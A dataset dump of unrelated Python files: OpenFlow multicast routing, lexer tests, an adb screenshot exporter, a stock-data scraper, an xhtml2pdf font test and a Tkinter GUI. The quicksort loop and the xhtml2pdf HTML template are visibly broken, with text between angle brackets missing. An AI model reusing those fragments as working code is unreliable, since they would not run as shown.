replaced will not be replaced again\n replaced_utilization = 0\n for flow in replacement_flows:\n log.debug('FlowCookie: ' + str(flow[0]) + ' CurrentTime: ' + str(replacement_time) + ' LastReplacementTime: ' + str(self.multicast_paths_by_flow_cookie[flow[0]]._last_flow_replacement_time))\n if self.multicast_paths_by_flow_cookie[flow[0]]._last_flow_replacement_time is not None:\n log.debug('Replacement Interval: ' + str(self.multicast_paths_by_flow_cookie[flow[0]]._last_flow_replacement_time))\n \n if (self.multicast_paths_by_flow_cookie[flow[0]]._last_flow_replacement_time is None) or (\n replacement_time - self.multicast_paths_by_flow_cookie[flow[0]]._last_flow_replacement_time >= self.flow_replacement_interval):\n log.debug('Replacing multicast flow with cookie: ' + str(flow[0]) + ' Bitrate: ' + str(flow[1]) + ' Mbps')\n self.multicast_paths_by_flow_cookie[flow[0]].update_flow_placement()\n \n replaced_utilization += flow[1]\n # Note: This causes the replacement to stop after replacing a single flow (may help prevent thrashing)\n # Uncomment this to have the module replace flows until the current link utilization minus the replacement bandwidth \n # is less than the link's congestion threshold.\n break\n \n # Note: Flows which are not actually replaced are counted toward the replacement utilization here, as it assumed that these flows\n # are already in the process of being replaced (this assumption should hold valid as long as the flow replacement interval is not\n # greater than 3 sampling intervals of the flow tracker)\n if replaced_utilization >= replacement_utilization:\n break\n \n log.debug('Replaced ' + str(replaced_utilization) + ' Mbps of flows')\n\n\ndef launch(link_weight_type = 'linear', static_link_weight = STATIC_LINK_WEIGHT, util_link_weight = UTILIZATION_LINK_WEIGHT, \n flow_replacement_mode = 'none', flow_replacement_interval = FLOW_REPLACEMENT_INTERVAL_SECONDS):\n # Method called by the POX core when launching the module\n link_weight_type_enum = LINK_WEIGHT_LINEAR # Default\n if 'linear' in str(link_weight_type):\n link_weight_type_enum = LINK_WEIGHT_LINEAR\n elif 'exponential' in str(link_weight_type):\n link_weight_type_enum = LINK_WEIGHT_EXPONENTIAL\n \n flow_replacement_mode_int = NO_FLOW_REPLACEMENT\n if 'periodic' in str(flow_replacement_mode):\n flow_replacement_mode_int = PERIODIC_FLOW_REPLACEMENT\n if 'cong_threshold' in str(flow_replacement_mode):\n flow_replacement_mode_int = CONG_THRESHOLD_FLOW_REPLACEMENT\n \n groupflow_manager = GroupFlowManager(link_weight_type_enum, float(static_link_weight), float(util_link_weight), flow_replacement_mode_int,\n float(flow_replacement_interval))\n core.register('openflow_groupflow', groupflow_manager)","sub_path":"mymcast/pox/openflow/groupflow.py","file_name":"groupflow.py","file_ext":"py","file_size_in_byte":39177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"224330479","text":"# Copyright 2015-2016 Nigel Small\n#\n# This file is part of Ampersand.\n#\n# Ampersand is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# Ampersand is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with Ampersand. If not, see .\n\nfrom ampersand import TokenStream, TokenType, Script\nfrom functools import reduce\nfrom itertools import combinations, product\nfrom unittest import TestCase\n\n\nclass TokenStreamTest(object):\n\n def __init__(self, source):\n self.source = source\n source_bytes = source.encode(\"utf-8\")\n self.script = Script(source_bytes)\n self.tokens = self.script.lines[0].tokens\n\n def assert_tokens(self, *expected):\n try:\n for i, token in enumerate(self.tokens):\n assert token == expected[i], \\\n \"%r does not lex correctly; token %d incorrect\\n%s != %s\" % \\\n (self.source, i, self.tokens, expected)\n except IndexError:\n assert False, \"%r does not lex correctly; tokens incorrect\\n%s != %s\" % \\\n (self.source, self.tokens, expected)\n\n\nclass NameTestCase(TestCase):\n \"\"\" A name token is composed of a head character followed by zero\n or more tail characters. Valid head characters are those classified\n by Unicode as letters (Ll|Lm|Lo|Lt|Lu), connectors (Pc) and\n currency symbols (Sc). Tail characters can also be any of these as\n well as numbers (Nd|Nl|No), non-spacing marks (Mn) and spacing\n combining marks (Mc).\n \"\"\"\n\n names = [\n \"n\",\n \"_\",\n \"__\",\n \"name\",\n \"a_name\",\n \"_a_name_\",\n \"__a__name__\",\n \"name_1\",\n \"_1st_name\",\n \"_1º_name\",\n \"_1ª_name\",\n \"ñâmé\",\n \"µname\",\n \"$\",\n \"¢\",\n \"£\",\n \"¤\",\n \"¥\",\n \"€\",\n \"$jquery\",\n \"STR$\",\n ]\n\n def test_names(self):\n for source in self.names:\n name_bytes = source.encode(\"utf-8\")\n tokens = list(TokenStream(name_bytes))\n assert len(tokens) == 2, \"%r does not contain 2 tokens\" % source\n token = tokens[1]\n expected_token = (TokenType.name, 0, 0, 0.0, name_bytes)\n assert token == expected_token, \"%r does not lex correctly\" % source\n\n\nclass NaturalTestCase(TestCase):\n\n numbers = [\n (\"0\", 0),\n (\"1\", 1),\n (\"1234\", 1234),\n (\"1_234\", 1234),\n (\"1__2__3__4__\", 1234),\n ]\n\n def test_natural_numbers(self):\n for source, value in self.numbers:\n TokenStreamTest(source).assert_tokens(\n (TokenType.natural, value, 0, 0.0, b\"\"),\n )\n\n def test_positive_integers(self):\n for source, value in self.numbers:\n TokenStreamTest(\"+\" + source).assert_tokens(\n (TokenType.symbol, ord(\"+\"), 0, 0.0, b\"+\"),\n (TokenType.natural, value, 0, 0.0, b\"\"),\n )\n\n def test_negative_integers(self):\n for source, value in self.numbers:\n TokenStreamTest(\"-\" + source).assert_tokens(\n (TokenType.symbol, ord(\"-\"), 0, 0.0, b\"-\"),\n (TokenType.natural, value, 0, 0.0, b\"\"),\n )\n\n def test_natural_numbers_with_units(self):\n for source, value in self.numbers:\n TokenStreamTest(source + \"B\").assert_tokens(\n (TokenType.natural, value, 0, 0.0, b\"B\"),\n )\n\n def test_natural_number_units_must_be_adjacent(self):\n for source, value in self.numbers:\n TokenStreamTest(source + \" B\").assert_tokens(\n (TokenType.natural, value, 0, 0.0, b\"\"),\n (TokenType.name, 0, 0, 0.0, b\"B\"),\n )\n\n\nclass RationalNumberTestCase(TestCase):\n\n fractions = [\n (\"¼\", 1, 4),\n (\"½\", 1, 2),\n (\"¾\", 3, 4),\n (\"⅐\", 1, 7),\n (\"⅑\", 1, 9),\n (\"⅒\", 1, 10),\n (\"⅓\", 1, 3),\n (\"⅔\", 2, 3),\n (\"⅕\", 1, 5),\n (\"⅖\", 2, 5),\n (\"⅗\", 3, 5),\n (\"⅘\", 4, 5),\n (\"⅙\", 1, 6),\n (\"⅚\", 5, 6),\n (\"⅛\", 1, 8),\n (\"⅜\", 3, 8),\n (\"⅝\", 5, 8),\n (\"⅞\", 7, 8),\n (\"↉\", 0, 3),\n (\"1¼\", 5, 4),\n (\"1½\", 3, 2),\n (\"1¾\", 7, 4),\n ]\n\n percentages = [\n (\"0%\", 0, 100),\n (\"1½%\", 3, 200),\n (\"37⅞%\", 303, 800),\n (\"10%\", 10, 100),\n (\"50%\", 50, 100),\n (\"100%\", 100, 100),\n (\"1000%\", 1000, 100),\n ]\n\n def test_rational_numbers(self):\n for source, numerator, denominator in self.fractions + self.percentages:\n TokenStreamTest(source).assert_tokens(\n (TokenType.rational, numerator, denominator, 0.0, b\"\"),\n )\n\n def test_positive_rational_numbers(self):\n for source, numerator, denominator in self.fractions + self.percentages:\n TokenStreamTest(\"+\" + source).assert_tokens(\n (TokenType.symbol, ord(\"+\"), 0, 0.0, b\"+\"),\n (TokenType.rational, numerator, denominator, 0.0, b\"\"),\n )\n\n def test_negative_rational_numbers(self):\n for source, numerator, denominator in self.fractions + self.percentages:\n TokenStreamTest(\"-\" + source).assert_tokens(\n (TokenType.symbol, ord(\"-\"), 0, 0.0, b\"-\"),\n (TokenType.rational, numerator, denominator, 0.0, b\"\"),\n )\n\n def test_rational_numbers_with_units(self):\n for source, numerator, denominator in self.fractions + self.percentages:\n TokenStreamTest(source + \"kB\").assert_tokens(\n (TokenType.rational, numerator, denominator, 0.0, b\"kB\"),\n )\n\n def test_rational_number_units_must_be_adjacent(self):\n for source, numerator, denominator in self.fractions + self.percentages:\n TokenStreamTest(source + \" kB\").assert_tokens(\n (TokenType.rational, numerator, denominator, 0.0, b\"\"),\n (TokenType.name, 0, 0, 0.0, b\"kB\"),\n )\n\n\nclass RealNumberTestCase(TestCase):\n\n formats = [\"{x}.\", \".{y}\", \"{x}.{y}\", \"{x}{e}{z}\", \"{x}.{e}{z}\", \".{y}{e}{z}\", \"{x}.{y}{e}{z}\"]\n x_values = [\"5\", \"5_\"]\n y_values = [\"8\", \"8_\"]\n e_values = [\"E\", \"e\", \"⏨\"]\n z_values = [\"1\", \"1_\", \"+1\", \"+1_\", \"+1\", \"+1_\"]\n\n numbers = set(f[0].format(**dict(zip(\"xyez\", f[1:])))\n for f in product(formats, x_values, y_values, e_values, z_values))\n\n def test_real_numbers(self):\n for source in self.numbers:\n expected_value = float(source.replace(\"_\", \"\").replace(\"⏨\", \"E\"))\n # print(\"%s -> %f\" % (source, expected_value))\n TokenStreamTest(source).assert_tokens(\n (TokenType.real, 0, 0, expected_value, b\"\"),\n )\n\n def test_real_numbers_with_units(self):\n for source in self.numbers:\n expected_value = float(source.replace(\"_\", \"\").replace(\"⏨\", \"E\"))\n # print(\"%s -> %f\" % (source, expected_value))\n TokenStreamTest(source + \"kB\").assert_tokens(\n (TokenType.real, 0, 0, expected_value, b\"kB\"),\n )\n\n def test_real_number_units_must_be_adjacent(self):\n for source in self.numbers:\n expected_value = float(source.replace(\"_\", \"\").replace(\"⏨\", \"E\"))\n # print(\"%s -> %f\" % (source, expected_value))\n TokenStreamTest(source + \" kB\").assert_tokens(\n (TokenType.real, 0, 0, expected_value, b\"\"),\n (TokenType.name, 0, 0, 0.0, b\"kB\"),\n )\n\n\nclass BytesTestCase(TestCase):\n\n numbers = [\n (\"#0\", b\"\\x00\"),\n (\"#1\", b\"\\x01\"),\n (\"#F\", b\"\\x0F\"),\n (\"#00\", b\"\\x00\"),\n (\"#01\", b\"\\x01\"),\n (\"#0F\", b\"\\x0F\"),\n (\"#FF\", b\"\\xFF\"),\n (\"#000\", b\"\\x00\\x00\"),\n (\"#001\", b\"\\x00\\x01\"),\n (\"#0FF\", b\"\\x00\\xFF\"),\n (\"#FFF\", b\"\\x0F\\xFF\"),\n (\"#0FFF\", b\"\\x0F\\xFF\"),\n (\"#FFFF\", b\"\\xFF\\xFF\"),\n (\"#00_00_00_01\", b\"\\x00\\x00\\x00\\x01\"),\n (\"#1234\", b\"\\x12\\x34\"),\n (\"#ABCD\", b\"\\xAB\\xCD\"),\n (\"#abcd\", b\"\\xAB\\xCD\"),\n (\"#1234ABCD\", b\"\\x12\\x34\\xAB\\xCD\"),\n (\"#1234abcd\", b\"\\x12\\x34\\xAB\\xCD\"),\n (\"#ABCD1234\", b\"\\xAB\\xCD\\x12\\x34\"),\n (\"#abcd1234\", b\"\\xAB\\xCD\\x12\\x34\"),\n (\"#12_34A_BCD\", b\"\\x12\\x34\\xAB\\xCD\"),\n (\"#AB_CD1_234\", b\"\\xAB\\xCD\\x12\\x34\"),\n (\"#01234ABCD\", b\"\\x00\\x12\\x34\\xAB\\xCD\"),\n (\"#1234_\", b\"\\x12\\x34\"),\n (\"#ABCD_\", b\"\\xAB\\xCD\"),\n ]\n\n def test_bytes(self):\n for source, value in self.numbers:\n TokenStreamTest(source).assert_tokens(\n (TokenType.bytes, len(value), 0, 0.0, value),\n )\n\n def test_bytes_and_continue_parsing(self):\n for source, value in self.numbers:\n TokenStreamTest(source + \":\" + source).assert_tokens(\n (TokenType.bytes, len(value), 0, 0.0, value),\n (TokenType.symbol, ord(\":\"), 0, 0.0, b\":\"),\n (TokenType.bytes, len(value), 0, 0.0, value),\n )\n\n\nclass SymbolTestCase(TestCase):\n\n symbols = {\n \"--\",\n \"->\",\n \">>\",\n \"---\",\n \"-->\",\n \"->>\",\n \">>>\",\n }\n\n def symbol_combinations(self):\n symbol_combinations = set()\n for combo in reduce(set.__or__, [set(combinations(self.symbols, i))\n for i in range(len(self.symbols) + 1)], set()):\n full_combo = set()\n for symbol in combo:\n for i in range(2, len(symbol) + 1):\n full_combo.add(symbol[:i])\n symbol_combinations.add(tuple(sorted(full_combo)))\n return sorted(symbol_combinations)\n\n def test_composite_symbols(self):\n for valid_symbols in sorted(self.symbol_combinations()):\n for symbol in sorted(self.symbols):\n expression = \"5 %s 8\" % symbol\n tokens = Script(expression.encode(\"utf-8\"), valid_symbols).lines[0].tokens\n symbol_tokens = [t for t in tokens if t.type == TokenType.symbol]\n combined_symbol = b\"\".join(token.s for token in symbol_tokens).decode(\"utf-8\")\n # check all symbol characters are represented once and once only\n assert combined_symbol == symbol\n # check for exact match\n if symbol in valid_symbols:\n assert len(symbol_tokens) == 1\n assert (TokenType.symbol, 0, 0, 0.0, symbol.encode(\"utf-8\")) in symbol_tokens\n # check each symbol token represents either a single token or a valid combo\n for token in symbol_tokens:\n assert len(token.s) == 1 or token.s.decode(\"utf-8\") in valid_symbols\n","sub_path":"test/test_lex.py","file_name":"test_lex.py","file_ext":"py","file_size_in_byte":11251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"571534065","text":"from .mapper import Mapper\n\n\nclass Metaclass(type):\n\n def __call__(cls, *args, **kwargs):\n obj = cls.__new__(cls,*args, **kwargs)\n args_list = list(args)\n if Mapper.exist(cls):\n params = Mapper.get_params(cls)\n args_list.extend(params)\n obj.__init__(*args_list, **kwargs)\n return obj","sub_path":"src/main/python/media_downloader/infrastructure/dependency_injection/meta_class.py","file_name":"meta_class.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"70497631","text":"\n\n\ndef Quicksort(list,begin,end):\n if begin>=end: #防止递归无限继续下去报错,在最后分成1个数排序之后 例如[34] 递归的时候return出来\n return\n temp=list[begin]\n i=begin\n j=end\n while i= temp:\n j-=1\n list[i]=list[j]\n\n while i 1:\n print(\"Please choose the device with which you want to continue:\\n\")\n for key, value in devices_dict.items():\n print(f\"{key}.\", value['device_id'], '-', value['device_md'])\n\n # User picks the device number and is converted to int\n # This also blocks the user to input anything but a number\n print(\"\\nPick a number that reflects the ones from the devices above.\\n\")\n\n try:\n user_input = input(\"> \")\n user_input = int(user_input)\n except Exception as e:\n print(f\"The value '{user_input}' is not a number. The script will now exit.\")\n sys.exit(0)\nelse:\n user_input = 1\n\n# Get the device id and model that the user selected\ntry:\n device_id = devices_dict[user_input]['device_id']\n device_model = devices_dict[user_input]['device_md']\nexcept Exception as e:\n print(f\"The position {user_input} does not exist.\")\n sys.exit(0)\n\nprint(f\"\\n### The device id: '{device_id}' which has the model: '{device_model}' was assigned for the script ###\")\n\n# Get the screenshots folder\ndevice_mtp = '/sdcard/'\nfolder_searched = 'Screenshots'\nstream = subprocess.check_output(['adb', '-s', device_id, 'shell', 'find', device_mtp, '-name', folder_searched])\nfolders_found = stream.decode(\"utf-8\").strip()\n\nif folders_found:\n export_folder = [item for item in folders_found.split('\\r\\n') if '.' not in item][0]\nelse:\n raise Exception(f\"There were no '{folder_searched}' folders found.\")\n\n# Get all photos from the folder found\nstream = subprocess.check_output(['adb', '-s', device_id, 'shell', 'cd', export_folder, ';', 'ls'])\nphotos_text = stream.decode(\"utf-8\").strip()\nphotos_list = compile(r'\\r\\n|\\r\\r\\n').split(photos_text)\nphotos_size = len(photos_list)\n\n# Create a dict with all the data existing in the screenshots folder\n# While some devices decide to only put screenshots here, some\n# manufacturers also add screen recordings here\nphotos_sorted = []\nfor photo_name in photos_list:\n stream = subprocess.check_output(['adb', '-s', device_id, 'shell', 'stat', '-c', '%y', f\"{export_folder}/'{photo_name}'\"])\n photo_attr = stream.decode(\"utf-8\").strip().split()\n photo_cdate = photo_attr[0]\n photo_ctime = search(r'.*(?=\\.|\\\\b)' ,photo_attr[1])[0]\n photos_sorted.append({'photo_name': photo_name, 'photo_cdate': photo_cdate, 'photo_ctime': photo_ctime})\n\n# Sort the list by their date and time and reverse them in order to get from the\n# oldest to the newest\nphotos_sorted = sorted(photos_sorted, \n key=lambda x: (datetime.datetime.strptime(x['photo_cdate'], '%Y-%m-%d'),\n datetime.datetime.strptime(x['photo_ctime'], '%H:%M:%S')),\n reverse=True)\n\n# Create new folder on the Desktop in which the export will be done\ndefault_export_folder = 'export_screenshots'\ndesktop_path = os.environ['USERPROFILE'] + '\\\\Desktop\\\\'\ncomplete_path = desktop_path + default_export_folder\n\nif not os.path.exists(complete_path):\n print(f\"\\n### Creating export folder at: '{complete_path}' ###\")\n os.mkdir(complete_path)\n\n# Check if the parameter volume gets a value higher than the number of items available\nif args.volume > photos_size:\n print(f\"\\n### Changing the volume to {photos_size} since there aren't {args.volume} items ###\")\n args.volume = photos_size\n\n# Exporting the files requested\nfor pos in range(args.volume):\n photo_name = photos_sorted[pos]['photo_name']\n stream = subprocess.check_output(['adb', '-s', device_id, 'pull', \n f'{export_folder}/{photo_name}',\n complete_path])\n result_string = stream.decode(\"utf-8\")\n print(f'\\n### {result_string} ###')","sub_path":"export_screenshots/get_screenshots.py","file_name":"get_screenshots.py","file_ext":"py","file_size_in_byte":5594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"486863577","text":"def fibo(n,f,s):\n \n if f == s:\n print('f == s ', n)\n if n <= f-1:\n return 0;\n elif n == f:\n return f\n else:\n return ((fibo((n-1),f,s))**2 + fibo((n-2),f,s))\n else:\n print('data -> ', n)\n if n == f:\n return f\n elif n == s:\n return s\n else:\n return ((fibo((n-1),f,s))**2 + fibo((n-2),f,s))\n\ndef main():\n d=input()\n data=fibo(int(d),1,1)\n print(data)\n\nif __name__:\n import cProfile\n cProfile.run(\"main()\")\n","sub_path":"algorithm/customfibo.py","file_name":"customfibo.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"542487391","text":"import bs4 as bs\nimport pickle\nimport requests\nimport datetime as dt\nimport os\nimport pandas as pd\nimport pandas_datareader.data as web\nimport matplotlib.pyplot as plt\nfrom matplotlib import style\nimport numpy as np\n\nstyle.use('ggplot')\n\n#\tUsing the examples taught by sentdex from his youtube channel\n\n\ndef save_sp500_tickers():\n\tprint (\"Saving the S&P500 tickers...\")\t#\tJust for debug\n\tresp = requests.get('https://en.wikipedia.org/wiki/List_of_S%26P_500_companies')\n\tsoup = bs.BeautifulSoup(resp.text, \"lxml\")\n\ttable = soup.find('table', {'class':'wikitable sortable'})\n\ttickers = []\n\tfor row in table.findAll('tr')[1:]:\n\t\tticker = row.findAll('td')[0].text\n#\tTreating these two companies for this character exception\n#\tFrom the wiki they are shown as a '.' and you need to use the\n#\t'-' to pull data from Yahoo Finance\n\t\tif ticker == 'BRK.B':\n\t\t\tticker = 'BRK-B'\n\t\tif ticker == 'BF.B':\n\t\t\tticker = 'BF-B'\n\t\ttickers.append(ticker)\n\n\twith open(\"sp500tickers.pickle\", \"wb\") as f:\n\t\tpickle.dump(tickers, f)\n\t\tprint(\"File sp500tickers.pickle created\")\t# Just for Debug\n\n\treturn tickers\n\n\n#save_sp500_tickers() - nao vamos mais usar\n\ndef get_data_from_yahoo(reload_sp500=True):\n\n\tif reload_sp500:\n\t\ttickers = save_sp500_tickers()\n\telse:\n\t\twith open(\"sp500tickers.pickle\",\"rb\") as f:\n\t\t\ttickers = pickle.load(f)\n\n\tif not os.path.exists('stock_dfs'):\n\t\tos.makedirs('stock_dfs')\n\n\tstart = dt.datetime(2000,1,1)\t#\tThese dates can change\n\tend = dt.datetime(2016,12,31)\n\n\tfor ticker in tickers: #\t[:10]: Este indice do ticker\n\t#\tDeve ser modificado se quero pegar a lista inteira\n\t#\tNo caso, estou usando os 10 primeiros para poder\n\t#\ttestar\n\n\t#\tThat ticker index can be changed so you dont need to wait for all \n\t#\tthe #500 companies to be pulled (it should take some 10-20 minutes\n\t#\tdepending on your computer)\n\t\tprint(ticker+'...ready')\t#\tJust for debug\n\t\tif not os.path.exists('stock_dfs/{}.csv'.format(ticker)):\n\t\t\tdf = web.DataReader(ticker,'yahoo',start,end)\n\t\t\tdf.to_csv('stock_dfs/{}.csv'.format(ticker))\n\t\telse:\n\t\t\tprint('Already have {} file'.format(ticker)) #\tSentdex debug\n\n#get_data_from_yahoo()\n\ndef compile_data():\n\n\twith open(\"sp500tickers.pickle\",\"rb\") as f:\n\t\ttickers = pickle.load(f)\n\t\tprint('loaded tickers to compile')\t#\tJust for debug\n\t#tickers = save_sp500_tickers()\n\tmain_df = pd.DataFrame()\n\n\tfor count,ticker in enumerate(tickers): #\t[:10]: - see comment above\n\t\tprint('reading '+ticker)\t#just for debug\n\t\tdf = pd.read_csv('stock_dfs/{}.csv'.format(ticker))\n\t\tdf.set_index('Date', inplace=True)\n \n\t\tdf.rename(columns = {'Adj Close' : ticker}, inplace=True)\n\t\tdf.drop(['Open','High','Low','Close','Volume'], 1, inplace=True)\n\n\t\tif main_df.empty:\n\t\t\tmain_df = df\n\t\telse:\n\t\t\tmain_df = main_df.join(df, how='outer')\n\n\t\tif count % 10 == 0:\n\t\t\tprint(count)\t#\tjust for debug, counting each 10 companies\n\t\t\t\t\t\t\t#\tprocessed\n\t\tprint(ticker+' compiled. Next...')\t#\tjust for debug\n\n\tprint (main_df.head())\n\tprint('Saving sp500_joined_closes.csv file...')\t# \tjust for debug\n\tmain_df.to_csv('sp500_joined_closes.csv')\n\n#get_data_from_yahoo()\n#compile_data()\n\ndef visualize_data():\n\tdf = pd.read_csv('sp500_joined_closes.csv')\n#\tdf['MMM'].plot()\n#\tprint('Plotting...')\n#\tplt.show()\n\tdf_corr = df.corr()\t\t\t#\tcreating correlation table\n#\tprint(df_corr.head())\t\t#\tthis line is not necessary\n\n\tdata = df_corr.values\t\t#\tget only the values, ignore header\n\t\t\t\t\t\t\t\t#\tand index\n\tfig = plt.figure()\t\t\t#\tcreating the graphic\n\tax = fig.add_subplot(1,1,1)\n\n\theatmap = ax.pcolor(data, cmap=plt.cm.RdYlGn)\t#\tsetting up the heatmap\n\n\tfig.colorbar(heatmap)\t#\tput heat color scale (legenda) to the side\n\tax.set_xticks(np.arange(data.shape[0]) + 0.5, minor=False)\n\tax.set_yticks(np.arange(data.shape[1]) + 0.5, minor=False)\n\tax.invert_yaxis()\t#\tinverting the yaxis so it doesnt have any \n\t\t\t\t\t\t#\tempty space on top\n\tax.xaxis.tick_top()\t#\tMove the X ticks to the top\n\n\tcolumn_labels = df_corr.columns #\tget the names from the tickers\n\trow_labels = df_corr.index \t\t#\tget the names from the tickers\n\n\tax.set_xticklabels(column_labels) #\tSet the names for the axis\n\tax.set_yticklabels(row_labels)\t #\tset the names for the axis as well\n\tplt.xticks(rotation=90)\t\t\t #\trotate the graphic to be shown down \n\t\t\t\t\t\t\t\t\t# and to the right\n\theatmap.set_clim(-1,1)\t#\tDefine the range\n\tplt.tight_layout()\t#\tshow the data tightly\n\tplt.show()\n\n\n\n\n#\tIf this is the first time running, please run first these two:\n\n#get_data_from_yahoo()\n#compile_data()\n\n#\tTo create all related files and spreadsheets\n\n\nvisualize_data()\n\n#\tThis code has until the 8th video of sentdex playlist 'Python for \n#\tfinance' videos from youtube\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"python_finance_2.py","file_name":"python_finance_2.py","file_ext":"py","file_size_in_byte":4608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"72846163","text":"# -*- coding: utf-8 -*-\nimport io\nfrom unittest import TestCase\nimport unittest\nimport os\nfrom xhtml2pdf.document import pisaDocument\n\n__doc__ = \"\"\"\n FontFamilyCombination provides us auxiliary functions to check\n the correct operation code that check one we have one or more font-name in CSS font-family.\n \"\"\"\n\nclass FontFamilyCombination(TestCase):\n\n\n tests_folder = os.path.dirname(os.path.realpath(__file__))\n fRegular_path = os.path.join(tests_folder, 'samples', 'font', 'Noto_Sans', 'NotoSans-Regular.ttf')\n fBold_path = os.path.join(tests_folder, 'samples', 'font', 'Noto_Sans', 'NotoSans-Bold.ttf')\n\n FFRegular = \"@font-face {{font-family: '#Noto_Regular','Times New Roman'; src: url(\\'{ttf}\\');}}\".format(ttf=fRegular_path)\n FFBold = \"@font-face {{font-family: Noto_Bold; src: url(\\'{ttf}\\');}}\".format(ttf=fBold_path)\n\n fRegular = \".fRegular{font-family: '#Noto_Regular', 'Times New Roman';}\"\n fBold = \".fBold{font-family: Noto_Bold;}\"\n\n pisa_doc = None\n\n #TRUE IF WE USE MORE THAN ONE FONT-NAME AS FAMILY-NAME VALUE\n values = True\n\n HTML_CONTENT = u\"\"\"\n \n \n \n \n \n \n\n \n Regular font type\n Bold font type\n \n\n \"\"\"\n\n def setUp(self):\n #Setting values that to be used in the following methods\n html = self.HTML_CONTENT.format(FFBold=self.FFBold, FFRegular=self.FFRegular,\n fRegular=self.fRegular, fBold=self.fBold)\n with io.BytesIO() as pdf_file:\n self.pisa_doc = pisaDocument(src=html,\n dest=pdf_file)\n\n\n def test_check_more_than_one_fontName(self):\n \"\"\"\n this function help us to check is the font-family contain a font-name list.\n \"\"\"\n fonts = []\n for css_class in self.pisa_doc.css[0].values():\n for font in css_class.values():\n fonts.append(font)\n for font in fonts:\n if isinstance(font,list):\n result = font\n break\n #here we are checking if fonts in pdf-doc contain a font-name list\n self.assertIsInstance(result,list)\n\n @unittest.skipIf(values == True,'\"test_check_only_one_fontName\" just need to run if font-family only have one font-name')\n def test_check_only_one_fontName(self):\n \"\"\"\n this function help us to check is the font-family contain only one font-name .\n \"\"\"\n fonts = []\n result = False\n for css_class in self.pisa_doc.css[0].values():\n for font in css_class.values():\n fonts.append(font)\n for font in fonts:\n if not isinstance(font, list):\n result = True\n else:\n result = False\n break\n #here we are checking if all objects in fonts list are str, the result have to be True\n self.assertTrue(result)\n","sub_path":"tests/test_CSS_font-family_font_combination.py","file_name":"test_CSS_font-family_font_combination.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"319605014","text":"# #################################################################################\nfrom __future__ import division, print_function;\n\nimport os, sys, time, datetime;\nimport numpy as np;\nimport matplotlib.pyplot as plt;\nfrom matplotlib import cm;\n\nplt.ion();\n\nimport tkinter as tk;\nimport tkinter.font as tkFont;\nfrom tkinter.filedialog import askopenfilename, asksaveasfilename, askdirectory;\nimport tkinter.messagebox as mBox;\nimport tkinter.filedialog as tkFileDialog;\nfrom tkinter import ttk # separator\n\n# to show tooltip box,\nimport platform;\nfrom platform import python_version\nfrom sys import platform as _platform\nfrom pprint import *\n\nimport pdb;\n\n# set path to import myModule/*.py\nmyHomeDir = os.path.expanduser(\"~\");\nmyModuleDirCurr = os.path.join(os.getcwd(), 'myModules');\nmyModuleDirCloud = os.path.join(os.path.split(os.getcwd())[0], 'myModules');\n\nif os.path.exists(myModuleDirCurr): myModuleDir = myModuleDirCurr;\nelif os.path.exists(myModuleDirCloud): myModuleDir = myModuleDirCloud;\nelse: myModuleDir = None;\n\nif myModuleDir != None: sys.path.insert(0, myModuleDir);\n\nimport re;\n\nimport mcsPstProc as mPstP; # post-processing MCS data\nfrom mcsPstProc import colored, cPrint, getCurrLineNo;\n\nfrom myToolTip import *;\n\nGPS = None;\n\ngpsLblTxt = \"MCS\\nPst-Proc\\n\";\n\nimport multiprocessing; # get number of cores available, ...\n\nimport mcsHelps as HELP; # import help text\nimport mcsGlobalVars as MGV; # import help text\n\ncsFont = {'fontname':'Comic Sans MS', 'fontsize':'14'};\nhFont = {'fontname':'Helvetica', 'fontsize':'14'};\nmFont = {'fontname':'Monaco', 'fontsize':'14'};\n\nroot = tk.Tk();\n\nbShowToolTip = True; # False;\n\nclass GUI_MCS():\n global GPS, gpsLblTxt;\n\n def __init__(self):\n # tk.tk.Frame.__init__(self, root, height=42, width=42)\n # ===============initialize GUI frames=========================\n self.frm0, self.frm1, self.frm2, self.frm3, self.frm4 = None, None, None, None, None;\n\n self.tmStr = None;\n\n if sys.platform in [\"win32\", \"windows\", \"linux\"]: self.bUnit, self.dUnit = \"s/mm2\", \"mm2/s\";\n else: self.bUnit, self.dUnit = u\"mm\\u00B2/s\", u\"\\u00D710\\u207B\\u00B3 s/mm\\u00B2\";\n\n self.mcsPstPro = tk.BooleanVar(); # Run mcs post processing\n self.mcsPstPro.set(True);\n self.bMaxTxt, self.delGTxt, self.delDeltaTxt = u\"maxB:%s\" % self.bUnit, \"\\u0394G\\u20D7 (mT/m)\", \"\\u0394Delta (ms)\";\n self.varyDelTxt, self.varyGdTxt, self.constBTxt = u\"vary \\u0394\", \"vary G\\u20D7\", \"cnst B\";\n\n self.postProCal, self.initDsp = tk.BooleanVar(), tk.BooleanVar();\n self.postProCal.set(True), self.initDsp.set(True);\n self.varyDelGdB = None;\n\n self.bMkDiffMovie, self.openHdrTxt, self.bCalcT2 = tk.BooleanVar(), tk.BooleanVar(), tk.BooleanVar();\n\n self.bMkDiffMovie.set(False), self.openHdrTxt.set(False), self.bCalcT2.set (False);\n self.bMcsDataLoaded = None;\n\n self.constantDiffTime, self.bMpiPySigComp = tk.BooleanVar(), tk.BooleanVar();\n self.constantDiffTime.set(True), self.bMpiPySigComp.set(False);\n\n self.smallDel, self.bigDel, self.GdStep, self.nbVals = tk.DoubleVar(), tk.DoubleVar(), tk.DoubleVar(), tk.IntVar();\n self.smallDel.set(10.0), self.bigDel.set(100.0), self.GdStep.set(10.0), 